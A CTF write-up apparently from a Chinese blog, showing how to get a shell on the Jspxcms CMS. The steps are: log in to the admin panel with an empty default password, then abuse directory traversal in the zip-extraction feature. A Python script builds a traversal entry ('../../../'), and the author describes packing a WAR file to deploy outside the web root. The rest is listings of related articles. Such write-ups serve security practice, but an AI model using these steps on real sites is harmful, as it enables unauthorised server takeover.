jspxcms

最新推荐文章于 2023-12-26 16:55:03 发布
最新推荐文章于 2023-12-26 16:55:03 发布
阅读量2.1k 收藏
点赞数 1
分类专栏: 2021DASCTF July X CBCTF WP 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/119303905
版权

jspxcms

先百度一下后台地址

/cmscp/index.do

 

然后百度默认密码,默认密码为空。

 找到一篇rce

 

https://www.hacksec.cn/Penetration-test/1284.html

Jspxcms后台的zip解压功能目录穿越漏洞导致getshell

由于这套CMS做了相关防御配置,压缩包里像上文中直接加入JSP文件是无法执行的,会报403错误。因而想到使用目录穿越的方式,跳出JspxCM的根目录,并根据war包会自动解压的特点,从而getshell。

先构造好war包

然后通过脚本写一个test5.zip压缩包,构造目录穿越

import zipfile 

if __name__ == "__main__":
    try:
        binary = b''
        zipFile = zipfile.ZipFile("test5.zip", "a", zipfile.ZIP_DEFLATED)

        info = zipfile.ZipInfo("test5.zip")

        zipFile.writestr("../../../safedog.html", binary)

        zipFile.close()

    except IOError as e:
        raise e

然后将war拖入zip中进行上传

上传完之后点击解压,然后访问我们目录穿越的文件就好了

至此就结束了

 

Jspxcms JSP内容管理系统 源码包 v8.0.2
11-28
Jspxcms是基于Java、JSP技术开发的国产开源CMS,是制作、维护网站的利器。国内CMS主要以PHP技术为主,基于Java、Jsp的CMS数量不多,功能和易用性也有一定差距。Jspxcms致力于做最好的Java
Jspxcms
city_moon的专栏
06-28 344
Jspxcms基于Java、SpringMVC、Spring、JPA等技术开发,支持各种操作系统(Windows、Linux、Unix)及各种数据库(MySQL、SqlServer、Oracle、DB2等)。 我们设计理念是: 以最小的工作量快速构建网站; 追求最大的灵活性以适应各种使用场合; 强大的功能满足各类网站的建站要求; 性能优越、系统安全、运行稳定,最大限度...
jspxcms内容管理系统CMS
04-03
jspxcms是一个开源的、基于Java的内容管理系统(CMS),技术上选择JavaEE行业最先进、最主流、最稳定的技术,非常适合二次开发、功能扩展、插件开发。使用的技术包括SpringMVC 3.1、Spring 3.1、Hibernate 3.6、JSP 2.0和Freemarker 2.3等。 jspxcms-5.1.0-release.zip jspxcms-5.1.0-release-eclipse.zip jspxcms-5.1.0-release-src.zip
Jspxcms 3.0发布,开源的Java CMS
jspxcms的专栏
08-19 2028
Jspxcms 3.0.0 版本今天正式发布。 本次发布宣告了Jspxcms进一步成熟,丰富的功能和灵活的设置,在网站制作上已经达到了无所不能的效果。真正实现无侵入式二次开发,统一权限、菜单、标签、国际化,所用功能增加都无需修改原有代码。 新增功能 会员中心(注册、登录、会员中心、找回密码、邮箱验证、修改个人资料、修改密码)、水印、留言板、广告、友情链接、评分组、敏感词、用户自定
jspxcms 4.0 mysql 5.0_Jspxcms 安装包
weixin_42361796的博客
01-27 183
Jspxcms是基于Java、JSP技术开发的国产开源CMS,是制作、维护网站的利器。国内CMS主要以PHP技术为主,基于Java、Jsp的CMS数量不多,功能和易用性也有一定差距。Jspxcms致力于做最好的Java CMS,依托Java的开源精神和强大的企业级功能,开创Java CMS的新时代。jspxcms-5.1.0-release-tomcat中包含tomcat,避免因为tomcat版本...
Jspxcms 源码包 v9.5.1.zip
03-25
Jspxcms 源码包 v9.5.1.zip】是一个包含了Jspxcms内容管理系统源代码的压缩文件,适用于计算机科学领域的学习、研究和建站实践,尤其适合进行毕业设计或论文编写时作为参考案例。Jspxcms是一款开源的Java内容管理...
Jspxcms 安装包 v9.5.1 tomcat版.zip
最新发布
03-25
Jspxcms是一款基于Java技术开发的内容管理系统,专为构建企业网站、新闻门户、政府网站等提供强大支持。这个“Jspxcms 安装包 v9.5.1 tomcat版.zip”是该系统的特定版本,适用于在Apache Tomcat服务器上进行部署。...
Jspxcms 9.5.1 安装包
05-01
Jspxcms是基于Java开发的内容管理系统(CMS),是建设网站的绝佳系统。使用动静态结合的页面展示方式,灵活自由的模型自定义,方便快捷的模板制作,人性化的后台操作方式,将网站建设变成一件快乐的事情。随时根据客户...
Jspxcms网站内容管理系统 安装包 v9.0.0 tomcat版.zip
07-06
Jspxcms简介 Jspxcms是基于Java、JSP技术开发的国产开源CMS,是制作、维护网站的利器。国内CMS主要以PHP技术为主,基于Java、Jsp的CMS数量不多,功能和易用性也有一定差距。Jspxcms致力于做最好的Java CMS,依托...
Jspxcms 目录结构
soldi_er的博客
11-11 781
文章目录Web目录说明Web根目录:ROOT后台JSP文件常见 WEB-INF 目录JspxCMS 10.2.0 的 WEB-INF 目录二次开发系列教程源代码目录结构webapp目录Java源码resources目录 Web目录说明 参考: Jspxcms无侵入式二次开发教程(V7)/ 2017 浅谈JSP - 知乎 / 2021 Web根目录:ROOT Web 根目录:Tomcat 的 Web 根目录是 /webapps/ROOT,所以 Jspxcms 的 Web 根目录相同。 ROOT 目录主要有
jspxcms资料部分整理
04-07
部分资料整理,目前只是整理了初始文件加载的部分,和后台的少数菜单,会继续后续上传,本人菜鸟,所以方便其他小白阅览,大拿级别的直接跳过吧
jspxcms使用教程文档
12-23
jspxcms使用教程文档、需要的自己下载
jspxcms系统源码
12-30
jspxcms源代码,很不错的开元软件
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
jspxcms 4.0 mysql 5.0_国内java版开源cms:Jspxcms 2.0下载
weixin_39529128的博客
01-27 173
软件简介Jspxcms是基于java技术开发的国产开源cms,是制作、维护网站的利器。国内cms 主要以php技术为主,基于java的cms数量不多,功能和易用性也有一定差距。Jspxcms致力于做最好的java cms,依托java的开源精神和强大的企业级功能,开创java cms的新时代。Jspxcms技术上选择JavaEE行业最先进、最主流、最稳定的技术,非常适合二次开发、功能扩展、插件开发...
jspxcms 4.0 mysql 5.0_Jspxcms4.0文件及源码目录结构说明
weixin_31237295的博客
02-26 274
Jspxcms文件及源码目录结构说明文件结构说明/back (后台资源文件夹,包括图片、js和css)/cmscp (用于解决tomcat的bug,无其他用处)/commons (公用资源文件夹,包括图片、脚本和样式)/errors (错误页面文件夹,如404,500等)/files (前台模板、图片、js、css文件夹)/fore (前台资源公用文件夹,比如js等)/jsp (前台jsp目录。如...
国内Java开源内容管理系统 Jspxcms 5.1 发布
weixin_34410662的博客
09-19 350
Jspxcms-5.1.0-release今天正式发布。这次发布重点提高了系统的稳定性和可维护性、修复了BUG。更新列表: 1、附件管理。可以删除无效附件和图片。 2、增加邮件加密发送。 3、采集新闻下一页的错误。 4、邮件发送要求SSL加密时出现错误。 5、定时任务没有分站点。 6、评论设置页没有返回按钮。 7、模版管理中,zip打...
Windows安装Jspxcms内容管理系统
soldi_er的博客
11-10 1773
文章目录概述系统介绍系统安装 概述 系统介绍 介绍:Jspxcms 基于 Java 的内容管理系统 相关技术: SpringBoot:提供了对Spring开箱即用的功能 Spring:是提供了IoC等功能,Java企业级开发框架 SpringMVC:MVC框架,使用方便,Bug较少 JPA:持久化框架。属于JSR标准,JPA实现选择Hibernate Shiro:安全组件。配置简便 Bootstrap:响应式设计前端框架 UEditor:Web富文本编辑器 系统安装 官网下载地址,但官网只提供最新版本下
Jspxcms-9.5.1由zip解压功能导致的目录穿越漏洞分析
st3pby的博客
12-26 1059
Jspxcms 是企业级开源网站内容管理系统,支持多组织、多站点、独立管理的网 站群,也支持 Oracle、SQL Server、MySQL 等数据库。Jspxcms-9.5.1 及之前版本的后台 ZIP 文件解压功能存在目录穿越漏洞,攻击者可以利用该漏洞,构造包含恶意 WAR 包的 ZIP 文件,达到 Getshell 的破坏效果。
JSPXCMS 部署
08-28
要部署JSPXCMS,首先需要下载Jspxcms源码包。Jspxcms是基于Java、JSP技术开发的国产开源CMS,是制作、维护网站的利器。国内的CMS主要以PHP技术为主,而基于Java、Jsp的CMS数量相对较少,但Jspxcms致力于做最好的Java CMS。 接下来,可以按照以下步骤进行部署: 1. 创建一个目录,例如"jspxcms"。 2. 将下载的Jspxcms源码包解压缩到该目录中。可以使用以下命令进行解压缩: ``` unzip jspxcms-9.5.1-release.zip ``` 这将会在当前目录下创建一个名为"jspxcms-9.5.1-release"的文件夹。 3. 可以将解压缩后的文件夹重新命名为"jspxcms",以便更方便地进行操作: ``` mv jspxcms-9.5.1-release jspxcms ``` 4. 进入"jspxcms"目录: ``` cd jspxcms/ ``` 5. 接下来,可以根据具体需求进行一些配置,例如数据库连接等。 6. 最后,可以将整个"jspxcms"目录部署到Tomcat服务器中,以便运行Jspxcms。Tomcat是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被广泛使用,也是开发和调试JSP程序的首选。 通过以上步骤,您已经成功部署了JSPXCMS,并可以在Tomcat服务器上运行它了。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Jspxcms源码包 v10.1.0](https://download.csdn.net/download/weixin_38643269/14122729)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Tomcat部署与JSPXCMS搭建](https://blog.csdn.net/weixin_46243253/article/details/110825235)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值